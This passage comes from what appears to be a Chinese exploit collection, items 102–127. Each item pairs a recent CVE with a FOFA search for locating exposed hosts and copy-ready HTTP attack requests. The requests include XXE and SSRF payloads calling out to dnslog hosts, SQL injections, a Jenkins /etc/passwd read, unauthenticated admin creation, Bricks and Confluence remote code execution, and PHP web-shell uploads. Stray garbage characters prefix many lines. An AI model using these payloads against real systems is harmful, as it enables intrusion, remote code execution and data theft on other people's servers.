$ W: G6 x6 F( K6 v3 F7 I: ZCVE-2024-21893
: ~+ m+ p- i5 f1 R7 {% YFOFA：body="welcome.cgi?p=logo"
7 V9 R& d4 e( Y* K- tPOST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
+ e& X0 x4 Q8 t/ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' B% D0 m; a# m. nConnection: close
Content-Length: 792
+ }- R1 V8 h/ F# F" XAccept-Encoding: gzip
. T" i! T. t. V7 e
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

, |$ B+ D( d+ l' j7 F- _103. Ivanti Pulse Connect Secure VPN XXE
- D, y# n/ Y( t: PCVE-2024-22024
FOFA：body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
: v2 q* T' |; F' XHost: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 h+ k( R7 n3 O' l  D# @) \Connection: close
2 R5 f- R5 J: F) j& a! J$ aContent-Length: 204
Content-Type: application/x-www-form-urlencoded
* e' T9 `% ^; ~- ]( p! x! lAccept-Encoding: gzip

6 q2 Y- b+ @- `" m9 PSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
; o% r/ ^& w; q- G* k4 R- n' [. e
0 @4 @4 T2 N. v2 x* X) V+ I- m
其中SAMLRequest的值是xml文件内容的base64值，xml文件如下
4 R; H; Q8 H2 }; [$ X<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
+ r+ R7 ?% i: ?9 i4 c+ j4 r

: D- x+ B/ O% Q7 V  I9 J4 m1 `104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
CVE-2024-0569
FOFA：title="TOTOLINK"
: P3 o) L: e+ {) FPOST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
' k, X. q" C7 i! H  V, bContent-Length:41
Accept:application/json,text/javascript，*/*;q=0.01
) }" R$ O8 i* \$ P% h+ J! H  oX-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
5 H; I/ o2 ]2 `  rContent-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
" N3 c  H# t! X1 m- MAccept-Encoding:gzip,deflate
3 ?+ }8 |% O# Q# c/ a$ _Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
: F1 L  }- ^5 _"topicurl":"getSysStatusCfg",
" G1 \1 x* h8 Z1 u3 z"token":""
! s7 x# o; B, O* v* M' Q}
$ l3 n  k4 N% ~; t, G1 t+ h
5 M: m# Q% |9 a# \3 E6 C105. SpringBlade v3.2.0 export-user SQL 注入
) A0 s: U1 g  k$ uFOFA：body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
: ?$ O3 _/ n7 q8 ]" t" i3 a
' E# f8 A; C2 p1 k/ v+ Y" N106. SpringBlade dict-biz/list SQL 注入
% u: W! W' j7 ^9 A7 rFOFA：body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
6 F, j% j6 Z' L% o, H0 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
  ~3 u3 ^# ~0 g+ _+ t
1 e  K5 D( N$ a$ L
107. SpringBlade tenant/list SQL 注入
FOFA：body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth:替换为自己的
7 o' r/ F  d% E4 h0 i: hConnection: close
# N- b5 c  w* C" T# i% n, u% ]

5 N8 e) r: ~4 p" C5 y, E& |108. D-Tale 3.9.0 SSRF
( c; E0 X" Z! ECVE-2024-21642
FOFA："dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
  |8 s% F- }# Y" i2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; z; |" `- J; h' |1 c% B( ?/ MAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
) h% H, s, z) u/ ~0 h

- E9 {) ~% h) N" Q% y109. Jenkins CLI 任意文件读取
" ]# [& f4 I0 Q3 ^CVE-2024-23897
FOFA：header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
3 o  K) C- ?5 e4 o# g& ?/ N$ KContent-Length: 163
$ S& A1 x* O  z- t
: r% S5 d9 U3 B% ^b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
4 G. {% P# U' a$ \! y

POST /cli?remoting=false HTTP/1.1
Host:
, v6 u. |; i3 g+ D" b/ l1 n' USession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 }' o6 r6 t- C3 _6 B3 ~* z4 Edownload
Content-Type: application/x-www-form-urlencoded
; v. P; D7 ]9 A  K/ FContent-Length: 0
3 b) A, L  _- h) w& o: p6 f
2 z7 \) N. S6 U. i6 l* X7 q
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
" v; A, N3 c; n/ x9 \java -jar jenkins-cli.jar help
3 S4 a! F$ j: R[COMMAND]
; |: q$ a- S) _5 ?Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
# ]" B# [0 i" j, k, b

1 o3 d+ k1 G; L% s110. Goanywhere MFT 未授权创建管理员
" I+ z4 f" I4 pCVE-2024-0204
FOFA：body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
! Y) U" ]4 o' _GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
4 ?% e$ w: u( O/ l$ I) xHost: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
, c4 L! Q9 c7 z5 o" v/ G0 I% J1 S5 KConnection: close
Accept: */*
/ ~. c' C% _3 e3 X/ SAccept-Language: en
Accept-Encoding: gzip
' {1 m3 H# i" B+ q) K: J

111. WordPress Plugin HTML5 Video Player SQL注入
CVE-2024-1061
FOFA："wordpress" && body="html5-video-player"
% `9 C) S0 X% ]GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
, \0 B9 {2 u+ y6 aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 a& x+ y+ I! C; BConnection: close
, F* {) Q" W0 rAccept: */*
Accept-Language: en
1 R% F- W7 c8 Q" U- B3 S7 z# o% ?Accept-Encoding: gzip

! [0 f7 W; ?5 k' ?
2 T0 b" D3 j% S112. WordPress Plugin NotificationX SQL 注入
2 C" m# ^# A# x" A" ]CVE-2024-1698
1 j* i* Z/ z3 g# lFOFA：body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

0 l2 Y, M- w" a$ c  X; P{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
- g; d7 }/ e. }5 q' r

113. WordPress Automatic 插件任意文件下载和SSRF
9 ~2 N2 K2 Q1 XCVE-2024-27954
FOFA："/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
( _  U8 B$ f' r; j+ `+ W% AHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
$ h/ O, L- F  {7 C4 gAccept: */*
Accept-Language: en
& d! G( z6 ?) W% z8 p9 y8 _" xAccept-Encoding: gzip

$ e! Q! _1 E/ @+ E: U+ j" X
114. WordPress MasterStudy LMS插件 SQL注入
FOFA：body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
% V' C7 ?% y( i- n& Y3 M7 U3 sHost: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
第一步，获取网站的nonce值
GET / HTTP/1.1
6 e" z' R; [/ ^; W+ r! W8 ~0 p; qHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip
% B+ \5 _1 _! ?4 q9 f5 K6 H6 a

第二步替换nonce值，执行命令
1 d/ {! ~- O7 I! a; i7 {6 VPOST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
9 N& g/ c9 p8 ]1 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ D) a$ Q  c2 V! a6 E3 ~Connection: close
Content-Length: 356
) @) l' {$ ?+ t4 p" }$ CContent-Type: application/json
: J1 _  ?" e' J1 C1 a6 o6 iAccept-Encoding: gzip

% z/ m6 }: g) Y! b" D8 B4 I6 K{
* Y) L0 B7 S3 W  p"postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
7 H: g" i$ y1 }3 S" R5 H7 a4 Z      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
# Y9 r! J# Z1 h3 n9 \. W# z: _        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
5 y' V" C" ?1 Y" I      }
# `0 r. u$ H" N) g1 }    }
+ ~7 F! C. v) g8 f6 \+ v& ^% s  }
) ?7 T5 F9 Y% W* j2 ?! H1 n) f/ |}


116. wordpress js-support-ticket文件上传
2 G. m  L) e3 H! \! `FOFA：body="wp-content/plugins/js-support-ticket"
# T; i9 O$ i8 B& CPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
$ }* |+ y% Z$ |% ^- h1 T7 h8 sconfiguration_saveconfiguration
# T9 |' x& t: f0 p0 g' q----------767099171
9 ^$ \& I& y# _0 j$ p7 JContent-Disposition: form-data; name="form_request"
0 \- {  g0 y4 B  Z$ a. Ujssupportticket
- u# O1 Z( D" }, q8 S----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
- M; E) O# M8 y; S% TContent-Type: image/png
----------767099171--

( ~$ _. ^- R9 q0 Q
0 p/ g3 T6 X: Y( B! u117. WordPress LayerSlider插件SQL注入
version：7.9.11 – 7.10.0
0 k; L! ~- @+ N# a4 ?, hFOFA：body="/wp-content/plugins/LayerSlider/"
( X- ]0 _" ?; R) p4 \GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
2 t% F9 \" D: L. z9 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% {+ A" j8 F; qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
* D- ^. i' u; F$ a4 PUpgrade-Insecure-Requests: 1
- Y; M5 l) E! y. D$ R7 E4 M
2 e3 b1 {4 `& Y3 J4 t# R# Y
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
CVE-2024-0939
# F; C2 d, |; X9 cFOFA：title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
9 V4 ]/ T/ }( JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, p/ F. g4 ?, s  n6 g! {Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
+ K- \/ a8 X7 P0 [, ~& |; @Content-Length: 405
( {- B0 b, D7 ^' \" ]$ T/ S/ k) j; J2 zOrigin: https://192.168.40.130:8443
3 j% A5 J' a8 I, \# Z0 b0 ~# gReferer: https://192.168.40.130:8443/Tool/uploadfile.php
2 h" P8 Q! |+ i6 o+ ^3 ~/ @  {+ bUpgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
2 Q) r3 I( t/ Q* O# _. a0 USec-Fetch-User: ?1
Te: trailers
Connection: close
5 g( d( T7 P6 G
-----------------------------13979701222747646634037182887
) a" v. U+ s. dContent-Disposition: form-data; name="file_upload"; filename="contents.php"
* [7 c5 D  X0 A4 T$ qContent-Type: application/octet-stream
9 K* U8 n; k6 a9 A- ~, |
, @, }! Q1 B9 e2 f<?php
  j. d! F% e; k" x/ y: f9 T; ]' osystem($_POST["passwd"]);
& q& T: q1 N6 y/ ?; \+ L$ s5 Z( _?>
-----------------------------13979701222747646634037182887
' S- y* v& P  K' gContent-Disposition: form-data; name="txt_path"
4 Y, t5 V- a8 @# u
/home/src.php
$ c3 v5 g% _, \) F' W-----------------------------13979701222747646634037182887--
$ Y6 N6 o% r, g
- S+ S0 X3 p9 X) A3 `/ P
6 ^1 i' f$ z% D8 J6 a, e( c访问/home/src.php
( _# ~8 h9 I( N
119. 北京百绰智能S20后台sysmanageajax.php sql注入
CVE-2024-1254
3 v2 e8 M, P8 ?" C( I7 H  g( KFOFA：title="Smart管理平台"
) ?3 d; ]  `" x2 k3 C先登录进入系统，默认账号密码为admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.11
Host: x.x.x.x
/ T3 N# C1 b* e, oCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
! I6 y; }; J0 q* H, eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
; F5 g* P3 _# l/ nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
- N, y( K# W0 j$ SOrigin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
8 K# m3 {' J6 p0 _) e' {+ HSec-Fetch-Dest: empty
% e7 Q4 A4 ?( e6 Q5 O" TSec-Fetch-Mode: cors
/ F- v- |7 l4 }8 q! B9 {( Q& hSec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

* V' H6 ]+ \  s! R6 X. Lsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


: m7 t5 E4 J8 }8 _. v120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ _/ l: S4 ^  y! K0 W& ICVE-2024-1253
FOFA：title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
# E9 P, e! Z- o* |5 @) N" u8 s) S+ @: bCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% x1 j7 A# M" Y* T: @9 I" O: `Content-Length: 597
% g1 e7 }7 W$ O% kOrigin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
7 T; a, i! {. l: E# l1 XUpgrade-Insecure-Requests: 1
8 d" @" M; U% \1 J- @& y, K( CSec-Fetch-Dest: document
9 H- I5 T* M) d( P$ m' }Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
5 d3 c7 V! f6 t' R# l9 T4 W% \
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
6 S- w7 E! [# |# @% \Content-Type: application/octet-stream
+ j0 M( k5 `# Z
<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
+ B9 s' Y5 i$ K6 z( fContent-Disposition: form-data; name="1_ck"
4 {3 Y9 ^4 p: D
1_radhttp
4 f# F8 ~. x8 _9 C4 E) |: ~6 W0 q-----------------------------42328904123665875270630079328
& n8 J! z7 {: E0 ZContent-Disposition: form-data; name="mode"

5 J* d2 A& A( E- A4 V* ?import
-----------------------------42328904123665875270630079328


文件路径/upload/2.php

/ ^& A/ ^: V/ Q6 c, e) q' f5 g( A121. 北京百绰智能S42管理平台userattestation.php任意文件上传
CVE-2024-1918
FOFA：title="Smart管理平台"
! E/ z$ P& x- c8 ZPOST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
% D1 x# C8 I7 c' X: D) gCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
0 S3 P& D! w' c9 O5 Y% k- s. ]; JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# Z% ~) ^" D+ y" J" q1 _  ]7 a9 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
/ c6 w. A7 y$ F$ {Content-Length: 592
3 B0 j1 G9 B; g: R7 YOrigin: https://192.168.40.130:8443
* g6 R+ y3 x" a( |Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
1 y0 [7 A; N2 n8 ISec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
+ `3 J/ R7 F- o3 H( ZTe: trailers
Connection: close
" a/ U' y+ I( ?- x. a
-----------------------------42328904123665875270630079328
, K5 q; L$ v6 d; ZContent-Disposition: form-data; name="web_img"; filename="1.php"
9 w; i3 k) t" w$ dContent-Type: application/octet-stream
0 R$ Q0 S0 X. H$ r1 O
2 ~* H) q- W; M) ~5 }<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"
+ l" B3 ^$ p% y+ c4 u! ^3 H5 ~) b$ t
1
4 K% @  ?9 c# o/ x0 f( H) N, i-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
! K" @) D' z7 Z8 s8 G  @-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

) V3 R1 f! y4 ?; w* B6 `set
1 o7 o! z; O- u8 g8 a9 ]: j-----------------------------42328904123665875270630079328
! d. [8 }5 V( G9 e  W& e, v7 I
. U8 k" d  I( m+ D. n
1 L% U( [; D% z( |boot/web/upload/weblogo/1.php

: Q1 j$ `/ F: [: ~' H122. 北京百绰智能s200管理平台/importexport.php sql注入
CVE-2024-27718FOFA：title="Smart管理平台"
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容，原文：sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
* t; l- W  d6 A+ t& |# kHost: x.x.x.x
5 Z) ~- |' q, u" ]) f3 ]: \Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
: c) ]  H/ x+ O: ^& a2 N$ I3 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) B2 b) M1 i) g0 T! C0 ]7 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 F) g+ t, Y4 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
- K* ?! x: p7 K2 \2 I: a! T/ XUpgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
! a+ d$ C2 o' v  t; ?Sec-Fetch-Mode: navigate
4 s$ K! ]7 R- j* ySec-Fetch-Site: none
* L5 s3 c6 d2 H* L8 n" hSec-Fetch-User: ?1
" H) b7 O0 c: k. MTe: trailers
Connection: close
/ T0 t0 x. Y5 [. k% i

% Z! }- C; O# x% i123. Atlassian Confluence 模板注入代码执行
( O/ x9 A7 I) _FOFA：app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
# K' l5 J& k$ f' |$ c# ^Accept-Language: en-US;q=0.9,en;q=0.8
2 m  O' Z1 t* w6 i4 a- ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
7 ~$ ^( J# H9 xConnection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
5 r! v$ `8 |+ X; a' ^' z5 E0 n$ l

9 m0 U! K- }6 B9 l/ |. N124. 湖南建研工程质量检测系统任意文件上传
0 ^, y( H" X/ T8 K  TFOFA：body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
, c+ \2 m( j! y" P' M- m& {2 VHost: 192.168.40.130:8282
( L% c  x8 r' O6 m3 {$ H  eUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% P! ]3 o2 L: W. E0 z$ Z8 u7 VContent-Length: 72
+ j! H4 r. ^& Z% h* G8 N9 L2 l6 w. {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
) T9 b1 Q7 R* X2 k6 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ w/ O9 J1 F# G8 z; hConnection: close
Content-Type: application/x-www-form-urlencoded
  K. `& n4 _+ h
+ x6 X6 G" v3 K/ ufilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>


http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect身份验证绕过
$ p/ c+ D. K( z" kCVE-2024-1709
* T" V6 l3 k, w9 kFOFA：icon_hash="-82958153"
- [5 ], @  T8 U* Chttps://github.com/watchtowrlabs ... bypass-add-user-poc


2 H" ~: V1 ]+ @2 X5 o9 |4 m使用方法
. N" v0 l; o% E% qpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!


& }# I. A* X4 m/ ?# ^# U创建好用户后直接登录后台，可以执行系统命令。
5 D: Z0 ?3 y3 A
126. Aiohttp 路径遍历
8 @1 O. b' U( |- _9 j  y6 c! @  u- EFOFA：title=="ComfyUI"
+ M7 N+ `9 Y4 I4 n9 n6 K" E7 }GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 q* `! M$ }) F, J+ i' f6 W' R0 KConnection: close
4 R  f& ^8 U6 B9 {% I3 n* KAccept: */*
Accept-Language: en
Accept-Encoding: gzip
/ _8 w, r1 p% L/ L+ c3 o( ?" w

5 ^) Y9 i/ e( L( Y5 a7 v. m127. 广联达Linkworks DataExchange.ashx XXE
+ Q- j4 b" w1 T, GFOFA：body="Services/Identification/login.ashx"
5 i+ i+ B# p) K! b% Y. ?POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
/ Y; O9 |% w8 @. K1 OContent-Length: 415
1 l8 Y, G/ x' ]( ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
" O9 m  Z/ ]3 j% G0 f1 E' z; g% jConnection: close
4 `) o& v# k) }Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
